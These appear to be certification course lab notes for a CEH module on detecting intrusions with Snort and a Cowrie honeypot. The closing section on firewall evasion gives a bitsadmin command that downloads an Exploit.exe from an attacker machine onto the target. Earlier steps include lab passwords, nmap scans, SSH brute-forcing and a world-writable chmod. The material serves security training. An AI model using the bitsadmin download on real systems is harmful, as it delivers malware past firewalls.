Module 12: Evading IDS, Firewalls , Honeypots

Ethical hackers or pen testers use numerous tools and techniques to evade the IDS and firewall on the target network. Recommended labs that will assist you in learning various evasion techniques include:

1. Perform intrusion detection using various tools

   • Detect intrusions using Snort

   • Deploy Cowrie honeypot to detect malicious network traffic

2. Evade ids/firewalls using various evasion techniques

   • Evade firewall through Windows BITSAdmin

Lab 1: Perform Intrusion Detection using Various Tools

Task 1: Detect Intrusions using Snort

1. Snort Installation:

• Launch the Windows 11 machine and log in as Admin using Pa$$w0rd.

• Navigate to the Snort installation directory (E:\CEH-Tools\CEHv13 Module 12\Intrusion Detection Tools\Snort) and run the Snort installer (Snort_2_9_15_Installe.x64.exe).

• Accept the license agreement and follow the installation wizard to install Snort. The default install location is C:\Snort.

2. Copy Configuration Files:

• Copy the necessary configuration files (e.g., snort.conf, so_rules, preproc_rules, and rules folders) from the provided location (E:\CEH-Tools\...) to C:\Snort.

• Replace any existing files in the C:\Snort\etc folder with the new ones.

3. Initial Snort Setup:

• Open a Command Prompt and navigate to C:\Snort\bin.

• Run snort to initialize Snort and then use snort -W to list your network interfaces.

• Identify the Ethernet Driver index (e.g., 1), and enable it using the command: snort -dev -i 1.

4. Test Snort:

• Leave the Snort window running and open another command prompt.

• Run a ping command (ping google.com) from the same machine to trigger a Snort alert.

• Verify that Snort detects the ping probe and generates an alert.

5. Configure snort.conf:

• Open the snort.conf file in Notepad++.

• Modify network variables in the snort.conf file:

  • Set HOME_NET to the IP address of the Windows 11 machine (e.g., 10.10.1.11).

  • Leave EXTERNAL_NET as any.

  • Set other server variables (e.g., DNS_SERVERS, SMTP_SERVERS, etc.) as needed.

• Update RULE_PATH, so_rules, and preproc_rules to the correct paths (e.g., C:\Snort\rules).

• Configure dynamic preprocessor libraries with the correct paths.

• Comment out unnecessary preprocessor rules.

• Set output plugin paths for classification.config and reference.config.

• Replace ipvar with var to ensure proper configuration.

6. Enable Detection Rules:

• Navigate to the C:\Snort\rules directory and enable ICMP rules by editing icmp-info.rules.

• Modify the rule to detect ICMP ping probes directed at the system (e.g., alert icmp $EXTERNAL_NET any -> $HOME_NET 10.10.1.11).

7. Run Snort in IDS Mode:

• Run Snort using the command:

  mathematicaCopy codesnort -iX -A console -c C:\Snort\etc\snort.conf -l C:\Snort\log -K ascii

  Replace X with the Ethernet interface index (e.g., 1).

• Snort starts in IDS mode, initializes, and waits for attacks.

8. Simulate an Attack:

• Switch to the Windows Server 2019 (Attacker machine) and use the command:

  Copy codeping 10.10.1.11 -t

  (Replace 10.10.1.11 with the actual IP address of the Windows 11 machine).

• Snort on Windows 11 detects this ping and triggers an alert.

9. Check Snort Logs:

• After Snort detects the attack, go to the Snort log directory (C:\Snort\log\10.10.1.11) and open the ICMP_ECHO.ids file.

• The log file contains entries of detected attacks.

10. Completion:

• The Snort IDS successfully detected and logged the attack (ping), indicating that the setup was successful.

• Close all open windows on both machines.

---

Task 2: Deploy Cowrie Honeypot to Detect Malicious Network Traffic

1. Create Cowrie User and Prepare Environment:

• Login to Ubuntu: Use Ubuntu/toor credentials.

• Create a new user cowrie (with no password) by running:

  cssCopy codesudo adduser --disabled-password cowrie

  Follow the prompts and confirm.

2. Access Cowrie Files:

• Navigate to CEH-Tools: Open Files on the Ubuntu machine and copy the cowrie folder from the network share (10.10.1.11/CEHv13 Module 12...) to /home/ubuntu.

• If ceh-tools is not visible, Connect to Server (smb://10.10.1.11), enter credentials (Admin/Pa$$w0rd), and navigate to the cowrie folder.

3. Install Dependencies:

• Open a terminal and switch to root user:

  Copy codesudo su

• Navigate to cowrie directory and install dependencies:

  bashCopy codecd cowrie
  pip install --upgrade -r requirements.txt

• Change to /home/ubuntu and modify file permissions:

  bashCopy codechmod -R 777 cowrie

4. Set Up Port Redirection:

• Redirect SSH traffic (port 22) to Cowrie's port 2222 using iptables:

  cssCopy codeiptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

5. Configure Cowrie to Run on Port 22:

• Use authbind to allow the cowrie user to bind to port 22:

  bashCopy codetouch /etc/authbind/byport/22
  chown cowrie:cowrie /etc/authbind/byport/22
  chmod 770 /etc/authbind/byport/22

6. Create Virtual Environment:

• Create and activate a Python virtual environment:

  bashCopy codevirtualenv --python=python3 cowrie-env
  source cowrie-env/local/bin/activate

7. Start Cowrie Honeypot:

• Navigate to the cowrie directory and start the honeypot:

  bashCopy codebin/cowrie start

8. View Cowrie Logs:

• Open the log file to check for incoming SSH connections:

  bashCopy codecd /var/log/cowrie/
  tail cowrie.log

• Ensure that the log shows: "Ready to accept SSH connections."

9. Simulate Attacks from Parrot Security:

• Switch to Parrot Security machine and run nmap to scan for open ports on the target:

  cssCopy codenmap -p- -sV 10.10.1.9

• You should see port 22 open, indicating the honeypot is running on this port.

• Attempt SSH Brute-Force: Use PuTTY to attempt SSH login (use ubuntu/toor or random credentials). The connection will be redirected to the Cowrie honeypot.

10. Observe Attack in Cowrie Logs:

• Switch back to Ubuntu machine and run:

  bashCopy codetail cowrie.log

• The log will capture the attacker’s SSH connection attempts and interactions.

---

Lab 2: Evade IDS/Firewalls using Various Evasion Techniques

Task 1: Evade Firewall through Windows BITSAdmin

bitsadmin /transfer Exploit.exe http://10.10.1.13/share/Exploit.exe c:\Exploit.exe